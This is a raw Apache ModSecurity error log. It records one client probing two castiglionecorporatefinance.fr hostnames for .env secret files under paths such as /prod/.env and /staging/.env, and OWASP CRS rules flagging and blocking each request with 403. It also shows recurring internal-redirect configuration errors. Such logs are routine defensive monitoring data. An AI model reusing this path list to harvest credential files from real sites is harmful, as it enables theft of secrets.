[Mon May 11 16:25:49.423265 2026] [security2:error] [pid 1411099:tid 1411107] [client 18.180.54.2:53716] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/htdocs/.env"] [unique_id "agHm7Q-Qm4vhlWBPlMi5zQAAAAY"]
[Mon May 11 16:25:49.558756 2026] [security2:error] [pid 1416109:tid 1416145] [client 18.180.54.2:53732] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /html/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/html/.env"] [unique_id "agHm7VV4kyjgo4bQBUhUBAAAAM8"]
[Mon May 11 16:25:49.558981 2026] [security2:error] [pid 1416109:tid 1416145] [client 18.180.54.2:53732] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/html/.env"] [unique_id "agHm7VV4kyjgo4bQBUhUBAAAAM8"]
[Mon May 11 16:25:49.559504 2026] [core:error] [pid 1416109:tid 1416145] [client 18.180.54.2:53732] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:49.559659 2026] [security2:error] [pid 1416109:tid 1416145] [client 18.180.54.2:53732] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/html/.env"] [unique_id "agHm7VV4kyjgo4bQBUhUBAAAAM8"]
[Mon May 11 16:25:50.114339 2026] [security2:error] [pid 1411055:tid 1411081] [client 18.180.54.2:53738] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /www/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/www/.env"] [unique_id "agHm7kWKUxpmnkK7zHx7sgAAARg"]
[Mon May 11 16:25:50.114568 2026] [security2:error] [pid 1411055:tid 1411081] [client 18.180.54.2:53738] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/www/.env"] [unique_id "agHm7kWKUxpmnkK7zHx7sgAAARg"]
[Mon May 11 16:25:50.115043 2026] [core:error] [pid 1411055:tid 1411081] [client 18.180.54.2:53738] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:50.115215 2026] [security2:error] [pid 1411055:tid 1411081] [client 18.180.54.2:53738] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/www/.env"] [unique_id "agHm7kWKUxpmnkK7zHx7sgAAARg"]
[Mon May 11 16:25:50.298331 2026] [security2:error] [pid 1411099:tid 1411111] [client 18.180.54.2:53748] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /live/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/live/.env"] [unique_id "agHm7g-Qm4vhlWBPlMi5zgAAAAs"]
[Mon May 11 16:25:50.298560 2026] [security2:error] [pid 1411099:tid 1411111] [client 18.180.54.2:53748] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/live/.env"] [unique_id "agHm7g-Qm4vhlWBPlMi5zgAAAAs"]
[Mon May 11 16:25:50.299044 2026] [core:error] [pid 1411099:tid 1411111] [client 18.180.54.2:53748] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:50.299218 2026] [security2:error] [pid 1411099:tid 1411111] [client 18.180.54.2:53748] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/live/.env"] [unique_id "agHm7g-Qm4vhlWBPlMi5zgAAAAs"]
[Mon May 11 16:25:50.797249 2026] [security2:error] [pid 1416109:tid 1416135] [client 18.180.54.2:53764] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /html/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/html/.env"] [unique_id "agHm7lV4kyjgo4bQBUhUBQAAAMU"]
[Mon May 11 16:25:50.797468 2026] [security2:error] [pid 1416109:tid 1416135] [client 18.180.54.2:53764] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/html/.env"] [unique_id "agHm7lV4kyjgo4bQBUhUBQAAAMU"]
[Mon May 11 16:25:50.797942 2026] [core:error] [pid 1416109:tid 1416135] [client 18.180.54.2:53764] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:50.798095 2026] [security2:error] [pid 1416109:tid 1416135] [client 18.180.54.2:53764] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/html/.env"] [unique_id "agHm7lV4kyjgo4bQBUhUBQAAAMU"]
[Mon May 11 16:25:50.995740 2026] [security2:error] [pid 1411055:tid 1411067] [client 18.180.54.2:53766] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /prod/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/prod/.env"] [unique_id "agHm7kWKUxpmnkK7zHx7swAAAQo"]
[Mon May 11 16:25:50.995977 2026] [security2:error] [pid 1411055:tid 1411067] [client 18.180.54.2:53766] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/prod/.env"] [unique_id "agHm7kWKUxpmnkK7zHx7swAAAQo"]
[Mon May 11 16:25:50.996472 2026] [core:error] [pid 1411055:tid 1411067] [client 18.180.54.2:53766] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:50.996624 2026] [security2:error] [pid 1411055:tid 1411067] [client 18.180.54.2:53766] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/prod/.env"] [unique_id "agHm7kWKUxpmnkK7zHx7swAAAQo"]
[Mon May 11 16:25:51.522883 2026] [security2:error] [pid 1411099:tid 1411106] [client 18.180.54.2:53770] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /live/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/live/.env"] [unique_id "agHm7w-Qm4vhlWBPlMi5zwAAAAU"]
[Mon May 11 16:25:51.523121 2026] [security2:error] [pid 1411099:tid 1411106] [client 18.180.54.2:53770] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/live/.env"] [unique_id "agHm7w-Qm4vhlWBPlMi5zwAAAAU"]
[Mon May 11 16:25:51.523617 2026] [core:error] [pid 1411099:tid 1411106] [client 18.180.54.2:53770] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:51.523784 2026] [security2:error] [pid 1411099:tid 1411106] [client 18.180.54.2:53770] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/live/.env"] [unique_id "agHm7w-Qm4vhlWBPlMi5zwAAAAU"]
[Mon May 11 16:25:51.706815 2026] [security2:error] [pid 1411201:tid 1411252] [client 18.180.54.2:53782] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /dev/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/dev/.env"] [unique_id "agHm7_y_GXSWIKeli0vyEQAAAIY"]
[Mon May 11 16:25:51.707026 2026] [security2:error] [pid 1411201:tid 1411252] [client 18.180.54.2:53782] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/dev/.env"] [unique_id "agHm7_y_GXSWIKeli0vyEQAAAIY"]
[Mon May 11 16:25:51.707498 2026] [core:error] [pid 1411201:tid 1411252] [client 18.180.54.2:53782] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:51.707643 2026] [security2:error] [pid 1411201:tid 1411252] [client 18.180.54.2:53782] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/dev/.env"] [unique_id "agHm7_y_GXSWIKeli0vyEQAAAIY"]
[Mon May 11 16:25:52.284270 2026] [security2:error] [pid 1411201:tid 1411253] [client 18.180.54.2:53798] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /prod/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/prod/.env"] [unique_id "agHm8Py_GXSWIKeli0vyEgAAAIc"]
[Mon May 11 16:25:52.284505 2026] [security2:error] [pid 1411201:tid 1411253] [client 18.180.54.2:53798] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/prod/.env"] [unique_id "agHm8Py_GXSWIKeli0vyEgAAAIc"]
[Mon May 11 16:25:52.284978 2026] [core:error] [pid 1411201:tid 1411253] [client 18.180.54.2:53798] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:52.285128 2026] [security2:error] [pid 1411201:tid 1411253] [client 18.180.54.2:53798] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/prod/.env"] [unique_id "agHm8Py_GXSWIKeli0vyEgAAAIc"]
[Mon May 11 16:25:52.544325 2026] [security2:error] [pid 1416109:tid 1416140] [client 18.180.54.2:53804] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /staging/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/staging/.env"] [unique_id "agHm8FV4kyjgo4bQBUhUCwAAAMo"]
[Mon May 11 16:25:52.544519 2026] [security2:error] [pid 1416109:tid 1416140] [client 18.180.54.2:53804] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/staging/.env"] [unique_id "agHm8FV4kyjgo4bQBUhUCwAAAMo"]
[Mon May 11 16:25:52.545023 2026] [core:error] [pid 1416109:tid 1416140] [client 18.180.54.2:53804] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:52.545202 2026] [security2:error] [pid 1416109:tid 1416140] [client 18.180.54.2:53804] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/staging/.env"] [unique_id "agHm8FV4kyjgo4bQBUhUCwAAAMo"]
[Mon May 11 16:25:53.117900 2026] [security2:error] [pid 1411099:tid 1411117] [client 18.180.54.2:53816] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /dev/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/dev/.env"] [unique_id "agHm8Q-Qm4vhlWBPlMi52gAAABE"]
[Mon May 11 16:25:53.118125 2026] [security2:error] [pid 1411099:tid 1411117] [client 18.180.54.2:53816] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/dev/.env"] [unique_id "agHm8Q-Qm4vhlWBPlMi52gAAABE"]
[Mon May 11 16:25:53.121107 2026] [core:error] [pid 1411099:tid 1411117] [client 18.180.54.2:53816] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:53.121644 2026] [security2:error] [pid 1411099:tid 1411117] [client 18.180.54.2:53816] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/dev/.env"] [unique_id "agHm8Q-Qm4vhlWBPlMi52gAAABE"]
[Mon May 11 16:25:53.398578 2026] [security2:error] [pid 1411099:tid 1411124] [client 18.180.54.2:53826] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /opt/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/opt/.env"] [unique_id "agHm8Q-Qm4vhlWBPlMi52wAAABg"]
[Mon May 11 16:25:53.398805 2026] [security2:error] [pid 1411099:tid 1411124] [client 18.180.54.2:53826] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/opt/.env"] [unique_id "agHm8Q-Qm4vhlWBPlMi52wAAABg"]
[Mon May 11 16:25:53.399390 2026] [core:error] [pid 1411099:tid 1411124] [client 18.180.54.2:53826] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:53.399551 2026] [security2:error] [pid 1411099:tid 1411124] [client 18.180.54.2:53826] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/opt/.env"] [unique_id "agHm8Q-Qm4vhlWBPlMi52wAAABg"]
[Mon May 11 16:25:53.967219 2026] [security2:error] [pid 1412074:tid 1412092] [client 18.180.54.2:53834] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /staging/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/staging/.env"] [unique_id "agHm8TJnyuKVXoStDha0cgAAAFA"]
